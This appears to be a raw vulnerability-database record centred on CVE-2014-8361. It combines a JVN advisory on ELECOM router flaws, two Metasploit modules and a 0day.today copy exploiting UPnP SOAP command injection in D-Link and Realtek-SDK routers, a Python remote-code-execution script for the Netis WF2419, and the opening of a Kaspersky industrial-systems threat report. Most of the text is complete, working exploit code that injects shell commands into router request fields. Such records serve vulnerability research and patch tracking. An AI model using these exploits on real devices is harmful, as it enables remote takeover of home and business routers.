\n\n * **Improper Access Control ([CWE-284](<https://cwe.mitre.org/data/definitions/284.html>))** \\- CVE-2021-20643 CVSS v3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N | **Base Score: 5.3** \n---|---|--- \nCVSS v2 | AV:N/AC:L/Au:N/C:N/I:P/A:N | **Base Score: 5.0** \n * **Script injection in web setup page ([CWE-74](<https://cwe.mitre.org/data/definitions/74.html>))** \\- CVE-2021-20644 CVSS v3 | CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | **Base Score: 5.2** \n---|---|--- \nCVSS v2 | AV:A/AC:L/Au:N/C:N/I:P/A:N | **Base Score: 3.3** \n * **Stored cross-site scripting ([CWE-79](<https://cwe.mitre.org/data/definitions/79.html>))** \\- CVE-2021-20645 CVSS v3 | CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N | **Base Score: 5.4** \n---|---|--- \nCVSS v2 | AV:N/AC:M/Au:S/C:N/I:P/A:N | **Base Score: 3.5** \n * **Cross-site request forgery ([CWE-352](<https://cwe.mitre.org/data/definitions/352.html>))** \\- CVE-2021-20646, CVE-2021-20647, CVE-2021-20650 CVSS v3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N | **Base Score: 4.3** \n---|---|--- \nCVSS v2 | AV:N/AC:H/Au:N/C:N/I:P/A:N | **Base Score: 2.6** \n * **OS command injection ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2021-20648 CVSS v3 | CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H | **Base Score: 6.8** \n---|---|--- \nCVSS v2 | AV:A/AC:L/Au:S/C:P/I:P/A:P | **Base Score: 5.2** \n * **Improper server certificate verification ([CWE-295](<https://cwe.mitre.org/data/definitions/295.html>))** \\- CVE-2021-20649 CVSS v3 | CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N | **Base Score: 4.8** \n---|---|--- \nCVSS v2 | AV:N/AC:H/Au:N/C:P/I:P/A:N | **Base Score: 4.0** \n * **OS command injection via UPnP ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2014-8361 CVSS v3 | CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | **Base Score: 8.8** \n---|---|--- \nCVSS v2 | AV:A/AC:L/Au:N/C:P/I:P/A:P | **Base Score: 5.0**\n\n ## Impact\n\n * By processing a specially crafted request, 
administrative password of the product may be changed - CVE-2021-20643\n * By displaying a specially crafted SSID on the web setup page, arbitrary script may be executed on the user's web browser - CVE-2021-20644\n * An arbitrary script may be executed on a logged in user's web browser - CVE-2021-20645\n * If a user views a malicious page while logged in to the web setup page of the product, arbitrary request may be executed and as a result, the product's settings may be altered and/or telnet daemon may be started - CVE-2021-20646, CVE-2021-20647, CVE-2021-20650\n * An attacker who can access the product may execute arbitrary OS commands - CVE-2021-20648\n * A man-in-the-middle attack may allow an attacker to alter the communication response and as a result, arbitrary OS commands may be executed on the product - CVE-2021-20649\n * When UPnP is enabled, an attacker who can access the product may execute arbitrary OS commands - CVE-2014-8361\n\n ## Solution\n\n**Stop using the products** \nThe developer states these vulnerable products are no longer supported, therefore stop using the products. \n \nAlso according to the developer, the following workarounds may mitigate some of the effects of these issues. 
\n**Apply a Workaround** \n**CVE-2021-20645, CVE-2021-20646, CVE-2021-20647, CVE-2021-20648, CVE-2021-20650**\n\n * Change web setup page's log in password.\n * Do not access other websites while logged in to the web setup page.\n * Close the web browser after the operation is finished on the web setup page.\n * Delete password of web setup page stored in web browser.\n**CVE-2021-20649**\n\n * Do not execute the firmware's \"Check for update files\" function.\n * For detailed setting change process, refer to [User's Manual](<https://www.elecom.co.jp/support/manual/network/wireless-lan/router/wrc-300febk-s/wrc-300febk-s_users_manual_v2.pdf>) for the products.\n**CVE-2014-8361**\n\n * Disable UPnP.\n\n ## Products Affected\n\n**CVE-2021-20643**\n\n * LD-PS/U1\n**CVE-2021-20644**\n\n * WRC-1467GHBK-A\n**CVE-2021-20645, CVE-2021-20646**\n\n * WRC-300FEBK-A\n**CVE-2021-20647, CVE-2021-20648, CVE-2021-20649**\n\n * WRC-300FEBK-S\n**CVE-2021-20650**\n\n * NCC-EWF100RMWH2\n**CVE-2014-8361**\n\n * WRC-300FEBK\n * WRC-F300NF\n * WRC-300FEBK-S\n", "edition": 1, "modified": "2021-01-26T00:00:00", "published": "2021-01-26T00:00:00", "id": "JVN:47580234", "href": "http://jvn.jp/en/jp/JVN47580234/index.html", "title": "JVN#47580234: Multiple vulnerabilities in multiple ELECOM products", "type": "jvn", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-12T22:40:15", "description": "Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. 
This module has been tested on DIR-865 and DIR-645 devices.\n", "published": "2013-07-14T13:42:41", "type": "metasploit", "title": "D-Link Devices UPnP SOAP Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8361"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/HTTP/DLINK_UPNP_EXEC_NOAUTH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'D-Link Devices UPnP SOAP Command Execution',\n 'Description' => %q{\n Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP\n interface. Since it is a blind OS command injection vulnerability, there is no\n output for the executed command. This module has been tested on DIR-865 and DIR-645 devices.\n },\n 'Author' =>\n [\n 'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module\n 'juan vazquez' # minor help with msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-8361'],\n ['OSVDB', '94924'],\n ['BID', '61005'],\n ['EDB', '26664'],\n ['URL', 'http://www.s3cur1ty.de/m1adv2013-020']\n ],\n 'DisclosureDate' => '2013-07-05',\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'MIPS Little Endian',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSLE\n }\n ],\n [ 'MIPS Big Endian', # unknown if there are BE devices out there ... 
but in case we have a target\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSBE\n }\n ],\n ],\n 'DefaultTarget' => 0\n ))\n\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')\n\n register_options(\n [\n Opt::RPORT(49152) # port of UPnP SOAP webinterface\n ])\n end\n\n def check\n begin\n res = send_request_cgi({\n 'uri' => '/InternetGatewayDevice.xml'\n })\n if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /<modelNumber>DIR-/\n return Exploit::CheckCode::Detected\n end\n rescue ::Rex::ConnectionError\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Unknown\n end\n\n def exploit\n print_status(\"Trying to access the device ...\")\n\n unless check == Exploit::CheckCode::Detected\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\n end\n\n print_status(\"Exploiting...\")\n\n execute_cmdstager(\n :flavor => :echo,\n :linemax => 400\n )\n end\n\n def execute_command(cmd, opts)\n new_portmapping_descr = rand_text_alpha(8)\n new_external_port = rand(32767) + 32768\n new_internal_port = rand(32767) + 32768\n\n uri = '/soap.cgi'\n\n soapaction = \"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"\n\n data_cmd = \"<?xml version=\\\"1.0\\\"?>\"\n data_cmd << \"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\\\"http://schemas.xmlsoap.org/soap/envelope\\\" SOAP-ENV:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\n data_cmd << \"<SOAP-ENV:Body>\"\n data_cmd << \"<m:AddPortMapping xmlns:m=\\\"urn:schemas-upnp-org:service:WANIPConnection:1\\\">\"\n data_cmd << \"<NewPortMappingDescription>#{new_portmapping_descr}</NewPortMappingDescription>\"\n data_cmd << \"<NewLeaseDuration></NewLeaseDuration>\"\n data_cmd << \"<NewInternalClient>`#{cmd}`</NewInternalClient>\"\n data_cmd << \"<NewEnabled>1</NewEnabled>\"\n data_cmd << \"<NewExternalPort>#{new_external_port}</NewExternalPort>\"\n data_cmd << \"<NewRemoteHost></NewRemoteHost>\"\n data_cmd << \"<NewProtocol>TCP</NewProtocol>\"\n 
data_cmd << \"<NewInternalPort>#{new_internal_port}</NewInternalPort>\"\n data_cmd << \"</m:AddPortMapping>\"\n data_cmd << \"</SOAP-ENV:Body>\"\n data_cmd << \"</SOAP-ENV:Envelope>\"\n\n begin\n res = send_request_cgi({\n 'uri' => uri,\n 'vars_get' => {\n 'service' => 'WANIPConn1'\n },\n 'ctype' => \"text/xml\",\n 'method' => 'POST',\n 'headers' => {\n 'SOAPAction' => soapaction,\n },\n 'data' => data_cmd\n })\n return res\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/dlink_upnp_exec_noauth.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-07T22:33:28", "description": "Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. 
This module has been tested successfully on a Trendnet TEW-731BR router with emulation.\n", "published": "2015-05-03T16:09:22", "type": "metasploit", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8361"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/HTTP/REALTEK_MINIIGD_UPNP_EXEC_NOAUTH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include REXML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',\n 'Description' => %q{\n Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command\n injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,\n there is no output for the executed command. 
This module has been tested successfully on a\n Trendnet TEW-731BR router with emulation.\n },\n 'Author' =>\n [\n 'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-8361'],\n ['ZDI', '15-155'],\n ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],\n ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']\n ],\n 'DisclosureDate' => '2015-04-24',\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'MIPS Little Endian',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSLE\n }\n ],\n [ 'MIPS Big Endian',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSBE\n }\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')\n\n register_options(\n [\n Opt::RPORT(52869) # port of UPnP SOAP webinterface\n ])\n end\n\n def check\n begin\n res = send_request_cgi({\n 'uri' => '/picsdesc.xml'\n })\n if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/\n return Exploit::CheckCode::Detected\n end\n rescue ::Rex::ConnectionError\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Unknown\n end\n\n def exploit\n print_status(\"Trying to access the device ...\")\n\n unless check == Exploit::CheckCode::Detected\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\n end\n\n print_status(\"Exploiting...\")\n\n execute_cmdstager(\n :flavor => :echo,\n :linemax => 50,\n :nodelete => true\n )\n end\n\n def execute_command(cmd, opts)\n uri = '/wanipcn.xml'\n soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'\n data_cmd = '<?xml version=\"1.0\"?>' + build_soap_req\n\n begin\n res = send_request_cgi({\n 'uri' => uri,\n 'vars_get' => {\n 
'service' => 'WANIPConn1'\n },\n 'ctype' => 'text/xml',\n 'method' => 'POST',\n 'headers' => {\n 'SOAPAction' => soap_action\n },\n 'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\")\n })\n return res\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\n end\n end\n\n def build_soap_req\n new_external_port = rand(32767) + 32768\n new_internal_port = rand(32767) + 32768\n\n xml = Document.new\n\n xml.add_element(\n 'SOAP-ENV:Envelope',\n {\n 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',\n 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'\n })\n\n xml.root.add_element('SOAP-ENV:Body')\n\n body = xml.root.elements[1]\n\n body.add_element(\n 'm:AddPortMapping',\n {\n 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'\n })\n\n port_mapping = body.elements[1]\n port_mapping.add_element('NewLeaseDuration')\n port_mapping.add_element('NewInternalClient')\n port_mapping.add_element('NewEnabled')\n port_mapping.add_element('NewExternalPort')\n port_mapping.add_element('NewRemoteHost')\n port_mapping.add_element('NewProtocol')\n port_mapping.add_element('NewInternalPort')\n\n port_mapping.elements['NewLeaseDuration'].text = ''\n port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'\n port_mapping.elements['NewEnabled'].text = '1'\n port_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\"\n port_mapping.elements['NewRemoteHost'].text = ''\n port_mapping.elements['NewProtocol'].text = 'TCP'\n port_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\"\n\n xml.to_s\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-11T05:23:58", "description": "Exploit for linux platform in category remote 
exploits", "edition": 2, "published": "2015-06-02T00:00:00", "type": "zdt", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8361"], "modified": "2015-06-02T00:00:00", "id": "1337DAY-ID-23686", "href": "https://0day.today/exploit/description/23686", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include REXML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',\r\n 'Description' => %q{\r\n Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command\r\n injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,\r\n there is no output for the executed command. 
This module has been tested successfully on a\r\n Trendnet TEW-731BR router with emulation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery\r\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-8361'],\r\n ['ZDI', '15-155'],\r\n ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],\r\n ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']\r\n ],\r\n 'DisclosureDate' => 'Apr 24 2015',\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'MIPS Little Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSLE\r\n }\r\n ],\r\n [ 'MIPS Big Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSBE\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(52869) # port of UPnP SOAP webinterface\r\n ], self.class)\r\n end\r\n \r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/picsdesc.xml'\r\n })\r\n if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/\r\n return Exploit::CheckCode::Detected\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n Exploit::CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n \r\n unless check == Exploit::CheckCode::Detected\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n \r\n print_status(\"#{peer} - Exploiting...\")\r\n \r\n execute_cmdstager(\r\n :flavour => :echo,\r\n :linemax => 50,\r\n :nodelete => true\r\n )\r\n end\r\n \r\n def execute_command(cmd, opts)\r\n uri = '/wanipcn.xml'\r\n 
soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'\r\n data_cmd = '<?xml version=\"1.0\"?>' + build_soap_req\r\n \r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => 'text/xml',\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soap_action\r\n },\r\n 'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\")\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\n \r\n def build_soap_req\r\n new_external_port = rand(32767) + 32768\r\n new_internal_port = rand(32767) + 32768\r\n \r\n xml = Document.new\r\n \r\n xml.add_element(\r\n 'SOAP-ENV:Envelope',\r\n {\r\n 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',\r\n 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'\r\n })\r\n \r\n xml.root.add_element('SOAP-ENV:Body')\r\n \r\n body = xml.root.elements[1]\r\n \r\n body.add_element(\r\n 'm:AddPortMapping',\r\n {\r\n 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'\r\n })\r\n \r\n port_mapping = body.elements[1]\r\n port_mapping.add_element('NewLeaseDuration')\r\n port_mapping.add_element('NewInternalClient')\r\n port_mapping.add_element('NewEnabled')\r\n port_mapping.add_element('NewExternalPort')\r\n port_mapping.add_element('NewRemoteHost')\r\n port_mapping.add_element('NewProtocol')\r\n port_mapping.add_element('NewInternalPort')\r\n \r\n port_mapping.elements['NewLeaseDuration'].text = ''\r\n port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'\r\n port_mapping.elements['NewEnabled'].text = '1'\r\n port_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\"\r\n port_mapping.elements['NewRemoteHost'].text = ''\r\n port_mapping.elements['NewProtocol'].text = 'TCP'\r\n port_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\"\r\n \r\n 
xml.to_s\r\n end\r\n \r\nend\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23686"}], "exploitpack": [{"lastseen": "2020-04-01T20:40:26", "description": "\nNetis WF2419 2.2.36123 - Remote Code Execution", "edition": 1, "published": "2020-03-02T00:00:00", "title": "Netis WF2419 2.2.36123 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19356", "CVE-2019-1337"], "modified": "2020-03-02T00:00:00", "id": "EXPLOITPACK:EC837ED1EA41395DFCD50B526170B177", "href": "", "sourceData": "# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution \n# Exploit Author: Elias Issa\n# Vendor Homepage: http://www.netis-systems.com\n# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75\n# Date: 2020-02-11\n# Version: WF2419 V2.2.36123 => V2.2.36123\n# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123\n# CVE : CVE-2019-19356\n\n\n# Proof of Concept: python netis_rce.py http://192.168.1.1 \"ls\"\n\n#!/usr/bin/env python\nimport argparse\nimport requests\nimport json\n\ndef exploit(host,cmd):\n\t# Send Payload\n\theaders_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', \n\t\t\t'Content-Type': 'application/x-www-form-urlencoded'}\n\tpost_data=\"mode_name=netcore_set&tools_type=2&tools_ip_url=|+\"+cmd+\"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0\"\n\tvulnerable_page = host + \"/cgi-bin-igd/netcore_set.cgi\"\n\treq_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)\n\tprint('[+] Payload sent')\n\ttry :\n\t\tjson_data = json.loads(req_payload.text)\n\t\tif json_data[0] == \"SUCCESS\":\n\t\t\tprint('[+] Exploit Sucess')\n\t\t\t# Get Command Result\n\t\t\tprint('[+] Getting Command Output\\n')\n\t\t\tresult_page = host + \"/cgi-bin-igd/netcore_get.cgi\"\n\t\t\tpost_data = \"mode_name=netcore_get&no=no\" \n\t\t\treq_result = 
requests.post(result_page, data=post_data, headers=headers_value)\n\t\t\tjson_data = json.loads(req_result.text)\n\t\t\tresults = json_data[\"tools_results\"]\n\t\t\tprint results.replace(';', '\\n')\n\t\telse:\n\t\t\tprint('[-] Exploit Failed')\n\texcept:\n \t\tprint(\"[!] You might need to login.\") \n\n# To be implemented\ndef login(user, password):\n\tprint('To be implemented')\n\ndef main():\n host = args.host\n cmd = args.cmd\n user = args.user\n password = args.password\n #login(user,password)\n exploit(host,cmd)\n\nif __name__ == \"__main__\":\n ap = argparse.ArgumentParser(\n description=\"Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]\")\n ap.add_argument(\"host\", help=\"URL (Example: http://192.168.1.1).\")\n ap.add_argument(\"cmd\", help=\"Command to run.\")\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin).\",\n default=\"admin\")\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin).\",\n default=\"admin\")\n args = ap.parse_args()\n main()", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2018-03-30T15:53:03", "bulletinFamily": "blog", "cvelist": ["CVE-2014-8361", "CVE-2017-8759"], "description": "\n\n_For many years, Kaspersky Lab experts have been uncovering and researching cyberthreats that target a variety of information systems \u2013 those of commercial and government organizations, banks, telecoms operators, industrial enterprises, and individual users. In this report, Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (_[_Kaspersky Lab ICS CERT_](<https://ics-cert.kaspersky.com/>)_) publishes the findings of its research on the threat landscape for industrial automation systems conducted during the second half of 2017. 
_\n\n_The main objective of these publications is to provide information support to global and local incident response teams, enterprise information security staff and researchers in the area of industrial facility security._\n\n## Overview of ICS vulnerabilities identified in 2017\n\n_The analysis of vulnerabilities was performed based on vendor advisories, publicly available information from open vulnerability databases (ICS-CERT, CVE, Siemens Product CERT), as well as the results of Kaspersky Lab ICS CERT's own research. Vulnerability data published on the _[_ICS-CERT_](<https://ics-cert.us-cert.gov/>)_ website in 2017 was used to create statistical diagrams._\n\n### Vulnerabilities in various ICS components\n\n#### Number of vulnerabilities identified\n\nIn 2017, the total number of vulnerabilities identified in different ICS components and published on the [ICS-CERT](<https://ics-cert.us-cert.gov/>) website was 322. This includes vulnerabilities identified in general-purpose software and in network protocols that are also relevant to industrial software and equipment. 
These vulnerabilities are discussed in this report separately.\n\n#### Analysis by Industry\n\nThe largest number of vulnerabilities affect industrial control systems in the energy sector (178), manufacturing processes at various enterprises (164), water supply (97) and transportation (74).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130415/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-1.png>)\n\n_Number of vulnerable products used in different industries \n(according to [ICS-CERT](<https://ics-cert.us-cert.gov/>) classification) \nvulnerabilities published in 2017_\n\n#### Severity levels of the vulnerabilities identified\n\nMore than half (194) of the vulnerabilities identified in ICS systems were assigned [CVSS v.3.0](<https://www.first.org/cvss>) base scores of 7 or higher, corresponding to a high or critical level of risk.\n\n_Table 1 \u2013 Distribution of published vulnerabilities by risk level_\n\n| **Severity score** | 9 to 10 (critical) | 7 to 8.9 (high) | 4 to 6.9 (medium) | 0 to 3.9 (low) |\n|---|---|---|---|---|\n| **Number of vulnerabilities** | 60 | 134 | 127 | 1 |\n\nThe highest severity score of 10 was assigned to vulnerabilities identified in the following products:\n\n * [iniNet Solutions GmbH SCADA Webserver](<https://ics-cert.us-cert.gov/advisories/ICSA-17-264-04>),\n * [Westermo MRD-305-DIN, MRD-315, MRD-355, and MRD-455](<https://ics-cert.us-cert.gov/advisories/ICSA-17-236-01>),\n * [Hikvision Cameras](<https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01>),\n * [Sierra Wireless AirLink Raven XE and XT](<https://ics-cert.us-cert.gov/advisories/ICSA-17-115-02>),\n * [Schneider Electric Modicon M221 PLCs and SoMachine Basic](<https://ics-cert.us-cert.gov/advisories/ICSA-17-103-02A>),\n * [BINOM3 Electric Power Quality Meter](<https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01A>),\n * [Carlo Gavazzi VMU-C EM and VMU-C PV](<https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03>).\n\nAll 
vulnerabilities that were assigned the severity rating of 10 have much in common: they have to do with authentication issues, can be exploited remotely and are easy to exploit.\n\nIn addition, the highest severity rating was assigned to a vulnerability in the [Modicon Modbus Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>), which is discussed below.\n\nIt should be noted that the CVSS base score does not account for the aspects of security that are specific to industrial automation systems or for the distinctive characteristics of each organization's industrial processes. This is why, when assessing the severity of a vulnerability, we recommend keeping in mind, in addition to the CVSS score, the possible consequences of its exploitation, such as the non-availability or limited availability of ICS functionality that affects the continuity of the industrial process.\n\n#### Types of vulnerabilities identified\n\nThe most common types of vulnerabilities include buffer overflow (Stack-Based Buffer Overflow, Heap-Based Buffer Overflow) and improper authentication (Improper Authentication).\n\nAt the same time, 23% of all vulnerabilities identified are web-related (Injection, Path Traversal, Cross-Site Request Forgery (CSRF), Cross-Site Scripting) and 21% are associated with authentication issues (Improper Authentication, Authentication Bypass, Missing Authentication for Critical Function) and with access control problems (Access Control, Incorrect Default Permissions, Improper Privilege Management, Credentials Management).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130422/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-2.png>)\n\n_Most common vulnerability types_\n\nExploitation of vulnerabilities in various ICS components by attackers can lead to arbitrary code execution, unauthorized control of industrial equipment and that equipment's denial of service (DoS). 
Importantly, most vulnerabilities (265) can be exploited remotely without authentication and exploiting them does not require the attacker to have any specialized knowledge or superior skills.\n\nExploits have been published for 17 vulnerabilities, increasing the risk of their exploitation for malicious purposes.\n\n#### Vulnerable ICS components\n\nThe largest number of vulnerabilities were identified in:\n\n * SCADA/HMI components (88),\n * networking devices designed for industrial environments (66),\n * PLCs (52),\n * and engineering software (52).\n\nVulnerable components also include protection relays, emergency shutdown systems, environmental monitoring systems and industrial video surveillance systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130429/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-3.png>)\n\n_Distribution of vulnerabilities identified by ICS components_\n\n### Vulnerabilities in industrial protocols\n\nAn important part of ICS software security research in 2017 was identifying serious vulnerabilities in implementations of industrial protocols. Specifically, vulnerabilities were identified in the [implementation of the Modbus Protocol in Modicon series controllers](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>) (that vulnerability was assigned a CVSS v. 3 base score of 10), as well as in [implementations of the OPC UA protocol stack](<https://ics-cert.us-cert.gov/advisories/ICSA-17-243-01B>) and in an implementation of the 